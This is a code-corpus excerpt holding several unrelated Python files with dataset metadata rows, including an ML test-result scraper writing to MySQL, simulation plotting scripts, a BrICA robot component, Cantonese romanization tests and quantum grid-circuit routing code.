[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run = {
'dataset_source': '',
'train_dataset_url': '',
'test_dataset_url': '',
}
def invoke(self):
"""
Scrapes the stdouterr from the R phase. Inserts into results tables.
The phase result is handled in the __init__ of this object.
        The work done here is on the self.test_run dictionary
@return: test_run dictionary
"""
self.insert_phase_result()
self.test_run.update(self.__scrape_parse_result__())
return self.test_run
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __scrape_parse_result__(self):
parse_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
parse_r = json.loads(line)
flag = False
break
if "PARSE RESULT" in line and "print" not in line:
flag = True
return parse_r['parse_result']
class ModelScraper(Scraper):
"""
An object that performs the scraping for the Model phase.
Relevant tables and their fields:
>test_run_clustering_result:
[k, withinss]
>test_run_model_result:
[model_json]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run_model_result = TableRow("test_run_model_result", self.perfdb)
def invoke(self):
"""
Scrapes the stdouterr from the R phase. Inserts into results tables.
Additionally handles the KMeans clustering results table.
@return: None
"""
self.insert_phase_result()
kmeans_result = self.__scrape_kmeans_result__()
if kmeans_result:
self.test_run_clustering_result = TableRow("test_run_clustering_result", self.perfdb)
self.test_run_clustering_result.row.update(kmeans_result)
self.test_run_clustering_result.update()
comp_result = self.__scrape_comparison_result__()
if comp_result != "":
self.test_run_binomial_comparison_result = TableRow("test_run_binomial_comparison", self.perfdb)
self.test_run_binomial_comparison_result.row.update(comp_result['comparison_result'])
self.test_run_binomial_comparison_result.update()
else:
self.test_run_model_result.row['model_json'] = \
MySQLdb.escape_string(str(self.__scrape_model_result__()))
self.test_run_model_result.update()
return None
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_comparison_result__(self):
comparison_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
comparison_r = json.loads(line)
flag = False
break
if "COMPARISON" in line and "print" not in line:
flag = True
return comparison_r
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __scrape_kmeans_result__(self):
kmeans_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
kmeans_r = json.loads(line)
flag = False
break
if "KMEANS RESULT" in line and "print" not in line:
flag = True
        return None if not kmeans_r or kmeans_r["kmeans_result"]["k"] == "None" else kmeans_r["kmeans_result"]
def __scrape_model_result__(self):
model_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
model_r = json.loads(line)
flag = False
break
if "MODEL RESULT" in line and "print" not in line:
flag = True
return model_r["model_result"]["model_json"]
class PredictScraper(Scraper):
"""
An object that performs the scraping for the Predict phase.
    This object is not always used; e.g., in the case of KMeans and PCA
    there is no prediction phase, but the results still need to be
    verified.
Relevant tables and their fields:
>test_run_binomial_classification_result:
        [auc, precision, recall, error_rate, minority_error_rate]
>test_run_cm_result:
[levels_json, cm_json, representation]
>test_run_multinomial_classification_result:
[level, level_actual_count, level_predicted_correctly_count, level_error_rate]
>test_run_phase_result:
[phase_name, start/end_epoch_ms, stdouterr, passed, correctness_passed,
timing_passed, contaminated, contamination_message]
>test_run_regression_result:
[aic, null_deviance, residual_deviance]
"""
def __init__(self, object):
self.perfdb = object.perfdb
self.phase = object.phase
self.test_dir = object.test_dir
self.test_short_dir = object.test_short_dir
self.output_dir = object.output_dir
self.output_file_name = object.output_file_name
self.contamination = os.path.join(self.output_dir, "contamination_message")
self.contaminated = 1 if os.path.exists(self.contamination) else 0
self.contamination_message = "No contamination."
if self.contaminated:
with open(self.contamination, "r") as f:
self.contamination_message = MySQLdb.escape_string(f.read().replace('\n', ''))
self.did_correct_pass = 0
self.did_time_pass = 0
self.test_run_binomial_classification_result = ""
self.test_run_cm_result = ""
self.test_run_phase_result = ""
self.test_run_regression_result = ""
self.test_run_binomial_comparison_result = ""
self.test_run_multinomial_classification_result = ""
def invoke(self):
"""
Scrapes the stdouterr from the R phase.
This invoke method will pass off control to the appropriate result scraper
using the __switch__ override.
Some preliminary scraping will be done here to obtain the correct result type.
@return: None
"""
self.insert_phase_result()
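        # TODO: determine the result type (via __get_predict_type__) and
        # dispatch to the matching scraper through self.__switch__().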
predict_type = ""
return None
def insert_phase_result(self):
trpr = TableRow("test_run_phase_result", self.perfdb)
with open(self.output_file_name, "r") as f:
trpr.row['stdouterr'] = MySQLdb.escape_string(f.read().replace('\n', ''))
trpr.row['contaminated'] = self.contaminated
trpr.row['contamination_message'] = self.contamination_message
trpr.row.update(self.__scrape_phase_result__())
trpr.update()
def __scrape_phase_result__(self):
phase_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
phase_r = json.loads(line)
flag = False
break
if "PHASE RESULT" in line and "print" not in line:
flag = True
self.did_correct_pass = int(phase_r['phase_result']['correctness_passed'])
self.did_time_pass = int(phase_r['phase_result']['timing_passed'])
return phase_r['phase_result']
def __get_predict_type__(self, type_candidate):
"""
Returns the type: 'parse', 'model', 'predict'
"""
print "TYPE CANDIDATE: " + type_candidate
types = ['binomial', 'regression', 'multinomial', 'cm']
rf = type_candidate.lower()
print "RETURNING TYPE: " + str( [t for t in types if t in rf])
return [t for t in types if t in rf]
def __switch__(self):
"""
Overrides the __switch__ method of the parent class.
        This switch method handles the different types of math
        results: regression, multinomial classification, CM result,
        binomial classification and binomial comparison.
Multinomial classification is the only case where there will
be multiple rows inserted, all other results constitute a single row
in their respective tables.
One important note is that the scrapers in this case handle the
database insertions.
"""
print "SWITCHING TO " + self.result_type
obj = {'regression' : self.__scrape_regression_result__,
'cm' : self.__scrape_cm_result__,
'multinomial': self.__scrape_multinomial_result__,
'binomial' : self.__scrape_binomial_result__,
'comparison' : self.__scrape_comparison_result__,
}.get(self.result_type, "bad key")
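        # Classification runs also produce a confusion matrix, so scrape it
        # before the type-specific result.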
if self.result_type in ['multinomial', 'binomial']:
self.__scrape_cm_result__()
return obj()
    def __scrape_regression_result__(self):
        regression_r = ""
        with open(self.output_file_name, "r") as f:
            flag = False
            for line in f:
                if flag:
                    regression_r = json.loads(line)
                    flag = False
                    break
                if "REGRESSION" in line and "print" not in line:
                    flag = True
        # Insert the scraped regression metrics, mirroring the other result
        # scrapers; the 'regression_result' key is assumed to match the JSON
        # emitted by the R phase.
        self.test_run_regression_result = TableRow("test_run_regression_result", self.perfdb)
        self.test_run_regression_result.row.update(regression_r['regression_result'])
        self.test_run_regression_result.update()
def __scrape_cm_result__(self):
cm_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
cm_r = json.loads(line)
flag = False
break
if "CM RESULTS JSON" in line and "print" not in line:
flag = True
self.test_run_cm_result = TableRow("test_run_cm_result", self.perfdb)
self.test_run_cm_result.row.update(cm_r["cm_json"])
self.test_run_cm_result.update()
def __scrape_binomial_result__(self):
binomial_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
binomial_r = json.loads(line)
flag = False
break
if "BINOMIAL" in line and "print" not in line:
flag = True
self.test_run_binomial_classification_result = TableRow("test_run_binomial_classification_result", self.perfdb)
self.test_run_binomial_classification_result.row.update(binomial_r['binomial_result'])
self.test_run_binomial_classification_result.update()
return None
def __scrape_multinomial_result__(self):
multinomial_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
multinomial_r = json.loads(line)
flag = False
break
if "MULTINOMIAL" in line and "print" not in line:
flag = True
for level in multinomial_r["multinomial_result"]:
self.test_run_multinomial_classification_result = TableRow("test_run_multinomial_classification_result", self.perfdb)
self.test_run_multinomial_classification_result.row.update(level)
self.test_run_multinomial_classification_result.update()
def __scrape_comparison_result__(self):
comparison_r = ""
with open(self.output_file_name, "r") as f:
flag = False
for line in f:
if flag:
comparison_r = json.loads(line)
flag = False
break
if "COMPARISON" in line and "print" not in line:
flag = True
self.test_run_binomial_comparison_result = TableRow("test_run_binomial_comparison", self.perfdb)
self.test_run_binomial_comparison_result.row.update(comparison_r['comparison_result'])
self.test_run_binomial_comparison_result.update()
| false | true |
1c4a7c6f7957c6d59fda330bbe04e8fea41006a6 | 1,933 | py | Python | plots/cv_over_a/qif/plot.py | ModelDBRepository/228604 | 8f641f73bcac2700b476663fe656fcad7d63470d | [
"BSD-3-Clause"
] | null | null | null | plots/cv_over_a/qif/plot.py | ModelDBRepository/228604 | 8f641f73bcac2700b476663fe656fcad7d63470d | [
"BSD-3-Clause"
] | null | null | null | plots/cv_over_a/qif/plot.py | ModelDBRepository/228604 | 8f641f73bcac2700b476663fe656fcad7d63470d | [
"BSD-3-Clause"
] | null | null | null | import analytics.shot_noise_driven.if_neuron as ana
import analytics.gaussian_white_noise_driven.if_neuron as gwnana
import pylab as pl
import numpy as np
import param_scan.io
import param_scan.parameter_sets
import param_scan.simulation_run
from param_scan.io import InDirectory
import os
from latex_param_values import LatexParamValues
from grace_plot import GracePlot
def with_tau_m(tau_m, prms):
""" convert back from dimnesionless units """
p = dict(prms)
p["tau_m"] = tau_m
p["rin_e"] = prms["rin_e"] / tau_m
p["tr"] = prms["tr"] * tau_m
p["df"] = prms["df"] / tau_m
p["dt"] = prms["dt"] * tau_m
p["f_c"] = prms["f_c"] / tau_m
p["f_max"] = prms["f_max"] / tau_m
p["f_sig"] = prms["f_sig"] / tau_m
p["r_sample"] = prms["r_sample"] / tau_m
return p
tau_m = 0.02 # s
with InDirectory(os.path.abspath(__file__)):
rfn, r = param_scan.io.load_newest_run(d="./sim")
prms = r["parameters"]
rfn_theo, r_theo = param_scan.io.load_newest_run_matching({}, d="./theo")
rfn_da, r_da = param_scan.io.load_newest_run_matching({}, d="./diffapp")
gr = GracePlot("plot")
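    # Plot the simulated, theoretical and diffusion-approximation CV curves
    # over a.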
a, rin_e, cv = param_scan.simulation_run.read_values(r, param_scan.parameter_sets.unroll(prms), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a, cv)
a_theo, rin_e_theo, cv_theo = param_scan.simulation_run.read_values(r_theo, param_scan.parameter_sets.unroll(r_theo["parameters"]), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a_theo, cv_theo)
a_da, rin_e_da, cv_da = param_scan.simulation_run.read_values(r_da, param_scan.parameter_sets.unroll(r_da["parameters"]), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a_da, cv_da)
gr.plot(a_theo, [1 for a in a_theo])
gr.plot(a_theo, [1./3**0.5 for a in a_theo])
gr.save()
LatexParamValues().write("paramvalues.tex", with_tau_m(tau_m * 1000, prms))
| 37.173077 | 189 | 0.682359 | import analytics.shot_noise_driven.if_neuron as ana
import analytics.gaussian_white_noise_driven.if_neuron as gwnana
import pylab as pl
import numpy as np
import param_scan.io
import param_scan.parameter_sets
import param_scan.simulation_run
from param_scan.io import InDirectory
import os
from latex_param_values import LatexParamValues
from grace_plot import GracePlot
def with_tau_m(tau_m, prms):
p = dict(prms)
p["tau_m"] = tau_m
p["rin_e"] = prms["rin_e"] / tau_m
p["tr"] = prms["tr"] * tau_m
p["df"] = prms["df"] / tau_m
p["dt"] = prms["dt"] * tau_m
p["f_c"] = prms["f_c"] / tau_m
p["f_max"] = prms["f_max"] / tau_m
p["f_sig"] = prms["f_sig"] / tau_m
p["r_sample"] = prms["r_sample"] / tau_m
return p
tau_m = 0.02
with InDirectory(os.path.abspath(__file__)):
rfn, r = param_scan.io.load_newest_run(d="./sim")
prms = r["parameters"]
rfn_theo, r_theo = param_scan.io.load_newest_run_matching({}, d="./theo")
rfn_da, r_da = param_scan.io.load_newest_run_matching({}, d="./diffapp")
gr = GracePlot("plot")
a, rin_e, cv = param_scan.simulation_run.read_values(r, param_scan.parameter_sets.unroll(prms), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a, cv)
a_theo, rin_e_theo, cv_theo = param_scan.simulation_run.read_values(r_theo, param_scan.parameter_sets.unroll(r_theo["parameters"]), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a_theo, cv_theo)
a_da, rin_e_da, cv_da = param_scan.simulation_run.read_values(r_da, param_scan.parameter_sets.unroll(r_da["parameters"]), ["a_e", "rin_e", "cv"], "stdout", ignore_errors=True)
gr.plot(a_da, cv_da)
gr.plot(a_theo, [1 for a in a_theo])
gr.plot(a_theo, [1./3**0.5 for a in a_theo])
gr.save()
LatexParamValues().write("paramvalues.tex", with_tau_m(tau_m * 1000, prms))
| true | true |
1c4a7c8b617700a230076e999868d1a98b6e2fb1 | 312 | py | Python | desafios/Ex023.py | FelipeAlafy/Python | da2374e55e8aa84e4ca6d9c7bf8dafeb546a4742 | [
"MIT"
] | null | null | null | desafios/Ex023.py | FelipeAlafy/Python | da2374e55e8aa84e4ca6d9c7bf8dafeb546a4742 | [
"MIT"
] | null | null | null | desafios/Ex023.py | FelipeAlafy/Python | da2374e55e8aa84e4ca6d9c7bf8dafeb546a4742 | [
"MIT"
] | null | null | null | num = int(input("Digite um número entre 0 e 9999: "))
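# Extract each decimal digit with floor division and modulo.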
u = num // 1 % 10
d = num // 10 % 10
c = num // 100 % 10
m = num // 1000 % 10
print("\033[36munidade: {}\033[m".format(u))
print("\033[33mdezena: {}\033[m".format(d))
print("\033[32mcentena: {}\033[m".format(c))
print("\033[31mmilhar: {}\033[m".format(m))
| 31.2 | 53 | 0.589744 | num = int(input("Digite um número entre 0 e 9999: "))
u = num // 1 % 10
d = num // 10 % 10
c = num // 100 % 10
m = num // 1000 % 10
print("\033[36munidade: {}\033[m".format(u))
print("\033[33mdezena: {}\033[m".format(d))
print("\033[32mcentena: {}\033[m".format(c))
print("\033[31mmilhar: {}\033[m".format(m))
| true | true |
1c4a7c8d6ad4b05645b9c03988afe18bb514fbae | 59 | py | Python | packages/Python/modern_robotics/__init__.py | Nutellaman/ModernRobotics | 88c94eec1e0e4eedbd3ae32819664179a9a5a6ba | [
"MIT"
] | 1,126 | 2016-10-10T19:04:47.000Z | 2022-03-31T21:22:58.000Z | packages/Python/modern_robotics/__init__.py | Nutellaman/ModernRobotics | 88c94eec1e0e4eedbd3ae32819664179a9a5a6ba | [
"MIT"
] | 34 | 2017-10-11T04:52:38.000Z | 2022-03-17T18:23:05.000Z | packages/Python/modern_robotics/__init__.py | Nutellaman/ModernRobotics | 88c94eec1e0e4eedbd3ae32819664179a9a5a6ba | [
"MIT"
] | 631 | 2016-10-11T03:43:36.000Z | 2022-03-24T21:41:47.000Z | from .__version__ import __version__
from .core import *
| 11.8 | 36 | 0.779661 | from .__version__ import __version__
from .core import *
| true | true |
1c4a7cf006f6295e328795766e19f2fe14ead264 | 2,259 | py | Python | examples/brainsimulator_agent/components/visual_area_component.py | masayoshi-nakamura/CognitiveArchitectureLecture | 5e036b48e92f266062eb7be8a366e754dee24f2c | [
"Apache-2.0"
] | 4 | 2016-03-13T03:01:28.000Z | 2016-03-31T02:51:56.000Z | examples/brainsimulator_agent/components/visual_area_component.py | masayoshi-nakamura/CognitiveArchitectureLecture | 5e036b48e92f266062eb7be8a366e754dee24f2c | [
"Apache-2.0"
] | null | null | null | examples/brainsimulator_agent/components/visual_area_component.py | masayoshi-nakamura/CognitiveArchitectureLecture | 5e036b48e92f266062eb7be8a366e754dee24f2c | [
"Apache-2.0"
] | null | null | null |
import brica1
import numpy as np
import pygazebo.msg.poses_stamped_pb2
import pickle
class VisualAreaComponent(brica1.Component):
def __init__(self):
super(VisualAreaComponent, self).__init__()
self.last_position = np.array((0, 0))
def __position_to_area_id(self, pos2d):
x = pos2d[0]
y = pos2d[1]
radius = 1
maze_width = 1
if x*x + y*y < radius*radius:
return (0, 0)
areaIdX = 0
if x < maze_width*0.5:
areaIdX = -1
if x > maze_width*0.5:
areaIdX = 1
areaIdY = 0
if y < maze_width*0.5:
areaIdY = -1
if y > maze_width*0.5:
areaIdY = 1
return (areaIdX, areaIdY)
def get_server_response(self):
return self.server_response
def callback(self, data):
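        # Parse the gazebo PosesStamped protobuf and publish the turtlebot
        # pose as component states.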
pose = pygazebo.msg.poses_stamped_pb2.PosesStamped()
message = pose.FromString(data)
turtlebot_id = 0
if message.pose[turtlebot_id].name != "turtlebot":
            raise Exception("message.pose[0].name is not turtlebot")
position = np.array((
message.pose[turtlebot_id].position.x,
message.pose[turtlebot_id].position.y))
orientation = np.array((
message.pose[turtlebot_id].orientation.x,
message.pose[turtlebot_id].orientation.y,
message.pose[turtlebot_id].orientation.z,
message.pose[turtlebot_id].orientation.w))
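        # Displacement since the previous pose message (previous - current).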
vel = self.last_position - position
self.last_position = position
self.set_state("out_body_velocity",
np.array((vel[0], vel[1])).astype(np.float32))
self.set_state("out_body_position",
position.astype(np.float32))
self.set_state("out_body_orientation",
orientation.astype(np.float32))
self.server_response = {"out_body_velocity":vel.tolist(),
"out_body_position":position.tolist(),
"out_body_orientation":orientation.tolist()}
#print self.server_response
def fire(self):
for key in self.states.keys():
self.results[key] = self.states[key]
| 31.375 | 76 | 0.575476 |
import brica1
import numpy as np
import pygazebo.msg.poses_stamped_pb2
import pickle
class VisualAreaComponent(brica1.Component):
def __init__(self):
super(VisualAreaComponent, self).__init__()
self.last_position = np.array((0, 0))
def __position_to_area_id(self, pos2d):
x = pos2d[0]
y = pos2d[1]
radius = 1
maze_width = 1
if x*x + y*y < radius*radius:
return (0, 0)
areaIdX = 0
if x < maze_width*0.5:
areaIdX = -1
if x > maze_width*0.5:
areaIdX = 1
areaIdY = 0
if y < maze_width*0.5:
areaIdY = -1
if y > maze_width*0.5:
areaIdY = 1
return (areaIdX, areaIdY)
def get_server_response(self):
return self.server_response
def callback(self, data):
pose = pygazebo.msg.poses_stamped_pb2.PosesStamped()
message = pose.FromString(data)
turtlebot_id = 0
if message.pose[turtlebot_id].name != "turtlebot":
            raise Exception("message.pose[0].name is not turtlebot")
position = np.array((
message.pose[turtlebot_id].position.x,
message.pose[turtlebot_id].position.y))
orientation = np.array((
message.pose[turtlebot_id].orientation.x,
message.pose[turtlebot_id].orientation.y,
message.pose[turtlebot_id].orientation.z,
message.pose[turtlebot_id].orientation.w))
vel = self.last_position - position
self.last_position = position
self.set_state("out_body_velocity",
np.array((vel[0], vel[1])).astype(np.float32))
self.set_state("out_body_position",
position.astype(np.float32))
self.set_state("out_body_orientation",
orientation.astype(np.float32))
self.server_response = {"out_body_velocity":vel.tolist(),
"out_body_position":position.tolist(),
"out_body_orientation":orientation.tolist()}
def fire(self):
for key in self.states.keys():
self.results[key] = self.states[key]
| true | true |
1c4a7d5d68e7e6f208af698969098f6dd360551f | 932 | py | Python | pycantonese/tests/test_yale.py | chaaklau/pycantonese | 94694fea2f3c3405d3b6bb6d504a56bb05a6496c | [
"MIT"
] | 124 | 2019-08-12T13:10:43.000Z | 2022-03-24T18:35:58.000Z | pycantonese/tests/test_yale.py | chaaklau/pycantonese | 94694fea2f3c3405d3b6bb6d504a56bb05a6496c | [
"MIT"
] | 13 | 2019-09-03T17:08:49.000Z | 2021-12-28T21:37:17.000Z | pycantonese/tests/test_yale.py | chaaklau/pycantonese | 94694fea2f3c3405d3b6bb6d504a56bb05a6496c | [
"MIT"
] | 15 | 2019-08-09T04:03:01.000Z | 2022-03-17T10:18:21.000Z | import pytest
from pycantonese import jyutping_to_yale
from pycantonese.jyutping.parse_jyutping import ONSETS, NUCLEI, CODAS
from pycantonese.jyutping.yale import (
ONSETS_YALE,
NUCLEI_YALE,
CODAS_YALE,
)
def test_correct_onset_set():
assert set(ONSETS_YALE.keys()) == ONSETS
def test_correct_nucleus_set():
assert set(NUCLEI_YALE.keys()) == NUCLEI
def test_correct_coda_set():
assert set(CODAS_YALE.keys()) == CODAS
@pytest.mark.parametrize("input_", ["", None])
def test_null_input(input_):
assert jyutping_to_yale(input_) == []
@pytest.mark.parametrize("input_", ["", None])
def test_null_input_as_list_false(input_):
assert jyutping_to_yale(input_, as_list=False) == ""
def test_jyutping_to_yale_m4goi1():
assert jyutping_to_yale("m4goi1") == ["m̀h", "gōi"]
def test_jyutping_to_yale_gwong2dung1waa2():
assert jyutping_to_yale("gwong2dung1waa2") == ["gwóng", "dūng", "wá"]
| 23.3 | 73 | 0.73176 | import pytest
from pycantonese import jyutping_to_yale
from pycantonese.jyutping.parse_jyutping import ONSETS, NUCLEI, CODAS
from pycantonese.jyutping.yale import (
ONSETS_YALE,
NUCLEI_YALE,
CODAS_YALE,
)
def test_correct_onset_set():
assert set(ONSETS_YALE.keys()) == ONSETS
def test_correct_nucleus_set():
assert set(NUCLEI_YALE.keys()) == NUCLEI
def test_correct_coda_set():
assert set(CODAS_YALE.keys()) == CODAS
@pytest.mark.parametrize("input_", ["", None])
def test_null_input(input_):
assert jyutping_to_yale(input_) == []
@pytest.mark.parametrize("input_", ["", None])
def test_null_input_as_list_false(input_):
assert jyutping_to_yale(input_, as_list=False) == ""
def test_jyutping_to_yale_m4goi1():
assert jyutping_to_yale("m4goi1") == ["m̀h", "gōi"]
def test_jyutping_to_yale_gwong2dung1waa2():
assert jyutping_to_yale("gwong2dung1waa2") == ["gwóng", "dūng", "wá"]
| true | true |
1c4a7d8f4b20f462196786fe00a5de5533884057 | 184 | py | Python | molsysmt/tools/openmm_Modeller/is_openmm_Modeller.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/tools/openmm_Modeller/is_openmm_Modeller.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/tools/openmm_Modeller/is_openmm_Modeller.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | _item_fullname_='openmm.Modeller'
def is_openmm_Modeller(item):
item_fullname = item.__class__.__module__+'.'+item.__class__.__name__
return _item_fullname_==item_fullname
| 20.444444 | 73 | 0.788043 | _item_fullname_='openmm.Modeller'
def is_openmm_Modeller(item):
item_fullname = item.__class__.__module__+'.'+item.__class__.__name__
return _item_fullname_==item_fullname
| true | true |
1c4a7e2fe78d848f06c3a08a7f2a2ea29679e094 | 1,158 | py | Python | setup.py | topshed/m8tricks | 51a55f0cdbb167252048101bc2aadf547a5730da | [
"MIT"
] | 10 | 2019-07-31T17:33:10.000Z | 2022-01-08T09:07:01.000Z | setup.py | topshed/m8tricks | 51a55f0cdbb167252048101bc2aadf547a5730da | [
"MIT"
] | 3 | 2019-08-18T19:25:20.000Z | 2022-01-07T12:19:23.000Z | setup.py | topshed/m8tricks | 51a55f0cdbb167252048101bc2aadf547a5730da | [
"MIT"
] | 1 | 2022-01-08T09:03:42.000Z | 2022-01-08T09:03:42.000Z | "Setup script for the m8tricks package"
import sys
from setuptools import setup, find_packages
if not sys.version_info >= (3, 5):
raise RuntimeError('This application requires Python 3.5 or later')
def main():
"Executes setup when this script is the top-level"
import m8tricks as app
from pathlib import Path
with Path(__file__).with_name('project.rst').open() as project:
setup(
name=app.__project__,
version=app.__version__,
description=app.__doc__,
long_description=project.read(),
classifiers=app.__classifiers__,
author=app.__author__,
author_email=app.__author_email__,
url=app.__url__,
license=[
c.rsplit('::', 1)[1].strip()
for c in app.__classifiers__
if c.startswith('License ::')
][0],
keywords=app.__keywords__,
packages=find_packages(),
include_package_data=True,
install_requires=app.__requires__,
entry_points=app.__entry_points__,
)
if __name__ == '__main__':
main()
| 28.95 | 71 | 0.598446 |
import sys
from setuptools import setup, find_packages
if not sys.version_info >= (3, 5):
raise RuntimeError('This application requires Python 3.5 or later')
def main():
import m8tricks as app
from pathlib import Path
with Path(__file__).with_name('project.rst').open() as project:
setup(
name=app.__project__,
version=app.__version__,
description=app.__doc__,
long_description=project.read(),
classifiers=app.__classifiers__,
author=app.__author__,
author_email=app.__author_email__,
url=app.__url__,
license=[
c.rsplit('::', 1)[1].strip()
for c in app.__classifiers__
if c.startswith('License ::')
][0],
keywords=app.__keywords__,
packages=find_packages(),
include_package_data=True,
install_requires=app.__requires__,
entry_points=app.__entry_points__,
)
if __name__ == '__main__':
main()
| true | true |
1c4a805580426d4b5885f1258cc4efdfad25817c | 2,870 | py | Python | src/topology/general/nn_circuit.py | Dreamonic/shor-algorithm | 19a4d95f0f19809cd3fe1db4d834ff3a02fba68d | [
"MIT"
] | null | null | null | src/topology/general/nn_circuit.py | Dreamonic/shor-algorithm | 19a4d95f0f19809cd3fe1db4d834ff3a02fba68d | [
"MIT"
] | null | null | null | src/topology/general/nn_circuit.py | Dreamonic/shor-algorithm | 19a4d95f0f19809cd3fe1db4d834ff3a02fba68d | [
"MIT"
] | null | null | null | from math import ceil, sqrt
from projectq.ops import Swap
from src.topology.general.circuit import Circuit, LongDistanceAlgorithm, Statistics, Restrictions, Node
from src.topology.general.qubit import QubitHandler, QubitType
class GridSwap(LongDistanceAlgorithm):
def prepare(self, circuit, src, tgt, **kwargs):
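        # Bring src next to tgt by swapping it along the shortest path.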
path = self.find_shortest_path(circuit, src, tgt)
self.swap_path(circuit, path)
def teardown(self, circuit, src, tgt, **kwargs):
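        # Undo the preparation swaps so qubits return to their original
        # positions.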
path = self.find_shortest_path(circuit, src, tgt)
self.swap_path(circuit, reversed(path))
def find_shortest_path(self, circuit, src, tgt):
        # Breadth-first search over the coupling graph. Tracking visited
        # nodes keeps the search linear and guarantees termination on the
        # cyclic grid even when tgt is unreachable.
        q = [[src]]
        visited = {src}
        while len(q) != 0:
            path = q.pop(0)
            cur = path[-1]
            if cur == tgt:
                return path
            for n in circuit.graph[cur]:
                if n in visited:
                    continue
                visited.add(n)
                new_path = list(path)
                new_path.append(n)
                q.append(new_path)
def swap_path(self, circuit, path):
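        # Swap adjacent qubits along the path, applying the gate in the
        # circuit and mirroring each swap in the bookkeeping via self.swap().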
prev = None
for i in path:
if prev is not None:
circuit.apply_two_qubit_gate(Swap, prev.name, i.name)
self.swap(prev, i)
prev = i
class GridCircuit(Circuit):
def __init__(self, engine, n, graph: dict = None, stats: Statistics = None, restrictions: Restrictions = None,
handlers: [QubitHandler] = None, ld_gate_algorithm=None):
super().__init__(graph=graph, stats=stats, restrictions=restrictions, handlers=handlers,
ld_gate_algorithm=ld_gate_algorithm)
self.create_grid(engine, ceil(sqrt(n)), ceil(n / sqrt(n)))
self.add_edges(ceil(sqrt(n)), ceil(n / sqrt(n)))
def create_grid(self, engine, x, y):
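        # Allocate one logical qubit per grid cell, named "log_<x>_<y>".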
for idx in range(x):
for idy in range(y):
node = Node("log_" + str(idx) + "_" + str(idy), engine.allocate_qubit(), QubitType.LOGICAL,
restrictions=self.restrictions)
self.add_node(node)
def add_edges(self, x, y):
        # Connect horizontal neighbours in both directions. Iterating over
        # every adjacent pair (rather than interior nodes only) also covers
        # grids that are just two cells wide.
        for idx in range(0, x - 1):
            for idy in range(0, y):
                self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
                              self.node("log_" + str(idx + 1) + "_" + str(idy)))
                self.add_edge(self.node("log_" + str(idx + 1) + "_" + str(idy)),
                              self.node("log_" + str(idx) + "_" + str(idy)))
        # Connect vertical neighbours in both directions.
        for idx in range(0, x):
            for idy in range(0, y - 1):
                self.add_edge(self.node("log_" + str(idx) + "_" + str(idy)),
                              self.node("log_" + str(idx) + "_" + str(idy + 1)))
                self.add_edge(self.node("log_" + str(idx) + "_" + str(idy + 1)),
                              self.node("log_" + str(idx) + "_" + str(idy)))
| 41 | 115 | 0.529965 | from math import ceil, sqrt
from projectq.ops import Swap
from src.topology.general.circuit import Circuit, LongDistanceAlgorithm, Statistics, Restrictions, Node
